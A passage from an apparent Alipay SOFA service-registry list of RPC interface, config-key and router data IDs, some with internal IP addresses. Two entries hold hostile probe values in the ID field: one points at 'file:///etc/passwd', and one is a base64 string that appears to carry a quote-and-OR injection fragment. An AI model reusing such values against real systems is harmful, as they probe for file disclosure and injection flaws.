CallbackService:1.0:rulemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.action.Action:1.0:merchantServiceAuditAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudprovision:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sdabombardier@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ucdp.common.service.facade.simple.DeliverFacade:1.0:cdp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.ops.OpsCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.rule.core.publish.drm.RulePublishResource.drmPushDelayMillisec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.emc.common.service.facade.api.EmcBusinessTransFacade:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.console.InvokeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.common.service.facade.cfgriskctrl.CfgChangeParsedDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:imasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskcore.common.facade.credit.AccessAssetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.config.ZcbConfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accenter.service.facade.api.AccenterOpenAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.processmngTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.dpchangeguardian.common.facade.change.DevChangeApi:1.0:dpchangeguardian@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.teaching.api.TeachingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_1213#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.auth_center.common.service.facade.v2.service.AuthService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:socialcore_settleApplyCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mshopprod.common.service.facade.ShopCommentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.common.AssetAttributeDictionaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.connection.InsSceneManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:infostudio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdchecker.service.integration.securitydata.SecuritydataQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_smartcall_nodeFrontService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.config.drm.DrmAcctransGeneralSwitchConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoorder.common.service.facade.api.PromoOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.web.infoview.drm.InfoviewResourceDRM.mskCommentRejectReason,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.AntVip-JavaClient:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsLdcManager.solutionCloneEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:compmng#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifemng.facade.ebpp.CacheServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.secrecy.SecrecyConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:rightsCheckService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinsight.service.api.forecast.AlarmCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.ops.OpsCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scibase.facade.project.ProjectRestFacade:1.0@rest#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:file:///etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-ExchangeRateCenter-Scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cif.facade.UserFreezeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.activity.service.facade.ActivityTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openmq.common.service.facade.MessageConsumeService:1.0:mrchportalcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sitecenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iacctrans.service.facade.api.AccountDailyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.migration.OperationPermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.ExpiredTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:gfsettle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bumng.common.service.facade.UserRolePermissionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlForbidWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.advancepayment.api.AptransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.StuffQrcodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lego.common.service.facade.data.MobileMonitorDataOpenApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsecu.common.service.facade.api.financialdata.FinancialDataManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.PubilcAppPunishmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepcoin.core.service.processor.Processor:1.0:nvwaCoinMergeWithdrawProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:insxhbprod_quitUpdate_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskmng.common.service.facade.api.RiskmngComplainContentConsultCallBack:1.0:secuprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:findatacanal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:edubizsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkpromocore_campApproveSuccessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.KbTenantUserActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.util.AntqMessageMngFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:logisticfinsandbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscharityprod.common.service.facade.mng.InsCharityProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:accountprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.rcacheTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:charityprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.discount.RtCampLabelService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:loadcentercloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.PlaceAroundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYZAUTHJSESSIONID.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkpaybizcore.common.facade.plan.api.PlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_CSCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksigncentre_rejectOrderOperateCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.assistinvestigate.core.AfscRequireLogServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.icif.service.facade.api.PrivilegeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.compmng.biz.shared.bxs.BxsCheckTicketsService:1.0:bxsSubTaskCheckTicketsServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.college.openevent.OpenEventFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.mng.feature.facade.UniversalOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","insautomarket@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S_developerops_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ccdc.common.service.facade.CreditCardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@zprodmng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.alipaymember.common.service.facade.exchange.service.BenefitExchangeOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.OrderAttachmentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.monitor.AlertRuleManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.order.OrderQueryRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.160.159.187#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbopenprod.common.service.facade.craftsman.CraftsmanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socplt.common.service.facade.DyDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.KeyApplicationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.gmcommon.common.drm.GmCommonDrmValueResource.operationShopMigrationSearchMaxPageCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.scene.PortfolioQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_ICTU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.clivecenter.common.service.facade.api.ClcAccessExtService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.227.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finorm.finriskcenter.common.facade.api.guardian.DbTableServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:mobile-global-saas-plugin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobileappcommon.common.service.facade.whitelist.WhiteListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.alideviceinfo.common.service.facade.changecode.ChangeCodeBindFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.core.service.doucode.ACodeAccountRelationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseacommon.common.dynamic2.spi.service.Dynamic2DebugService:1.0:apshopcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.requiremng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.Arch:name=com.alipay.finsupport.component.cache.masterdata.drm.MasterdataDRM.unknowTypeFinanceExchangeCode,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.client.qaZQueue14#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:mobiletms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.7.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_publishModifyProdCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antlawCancleWordTemplatecollBackServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.FlowConfigDrm.homeDecorateContractSignFlow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeco.facade.stresstestmng.bizservice.LoadTestManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.spis.EntityDiagnosisService:1.0:habaseline_EntityDiagnosisService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.service.BPService:1.0:fcprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata3.model.service.ReleaseService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_LOAN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.ptcore.common.service.facade.api.prodsale.ProdSaleRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskAccessService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.mobile.scancodelogin.DeveloperRoleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bic.common.service.facade.BiometricSecurityKeyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.QcRetryWholeMissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_ALIFI_NEW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.grmcore.common.service.facade.api.GrmBuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.246.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.smartscene.weather.task.WeatherTaskScheduleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:switchSignContractNode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.apacc.common.service.facade.module.ModuleEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acrescore.facade.RoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:sliceSummaryTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.UserActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.minBudgetAmtInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.242.220#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.amldata.com.service.facade.api.SdNamelistServie:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:settlecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.85.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:loanopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.RecordFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fincommontaskhub.service.facade.console.ModeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Notify_SubscriptionInfo_BindingTP_F_SC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.appstore.common.service.facade.isvinfo.IsvInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echannelcenter.common.service.facade.EchannelProcessChoreographFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.176.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.extend-request:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.team.common.service.api.issue.IssueContextRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.eventsource.AlarmEventSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.DeliverAddressService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.InstitutionDrmResource.whiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.core.config.drm.SummaryConfRefreshMergeAccNoDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_IVR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finsupport:name=com.alipay.finnet.service.drm.ChannelFilterDRM.holdOrgInstChannelApi,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-findatacanal-patrol-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antmember.common.service.facade.activity.ActivityConfigService:1.0:newbieSpecialColumnShowConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.repay.RepayPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.SearchGroovyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fin.pdcore.common.service.facade.adapter.ProductCommonQueryFacade:1.0:finpdcorewealth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.search.api.InitCityBoxApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardAccountInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:tinyGameBetaFinishedCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.biz.platform.tinyapp.AppQrCodeManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_B_FOPSHOP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.transfercenter.common.service.facade.api.TransferQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instbill.common.service.facade.model.api.sum.SumBillOperationFacade:1.0:instbill@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservecenter.facade.api.PaymentFileManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.242.225#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.salesmng.common.service.facade.sales.AppointmentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.ext.QueryCheckResultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.105.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dss.endpoint.rest.facade.TaskRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.sampleRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileapp.biz.rpc.smscode.SmsCodeManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:eHl6J1x0T3JcdGFudHdlYnNjYW5zWVc1MD1Nek13TWpRNE5qa3RMVEV4TURBd01qQXlNZw==@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insopenprod.common.service.facade.api.InsTradeApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.unifylogin.UnifyUserLoginServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:recadmin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.165.197.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:poscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.service.facade.CustomerInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instfund.facade.api.InstFundTransferRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custrelation.service.facade.entity.InsuranceRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingcore.common.service.facade.InsMarketingParticipateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfbsc.facade.api.cashallocation.CashAllocationAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.meshyuniverse.core.rpc.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.opinioncore:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cdp.common.service.space.feedback.UserFeedbackApi:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.otp.GAOtpCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.rate.triple.RatePortalSearchTriple:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.ldc.baitiaoprod.changeMode,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:openauth@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.spi.OperationConfigCallbackFacade:1.0:trafficcardsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcustprod.common.service.facade.api.MemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ESCROWEXPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.87.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.dt.onedata.dwm.client.definition.AtomicIndexQueryOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echo.platform.playback.service.EchoPlaybackService:1.0:cfmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:locals@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:xviewconsole_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.otp.common.service.facade.api.BiologyManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.clientcache.innerclient.slaver.api.InnerClientSlaverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.30.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.frdecision.common.service.facade.api.EventSchemeManageFacade:1.0@DEFA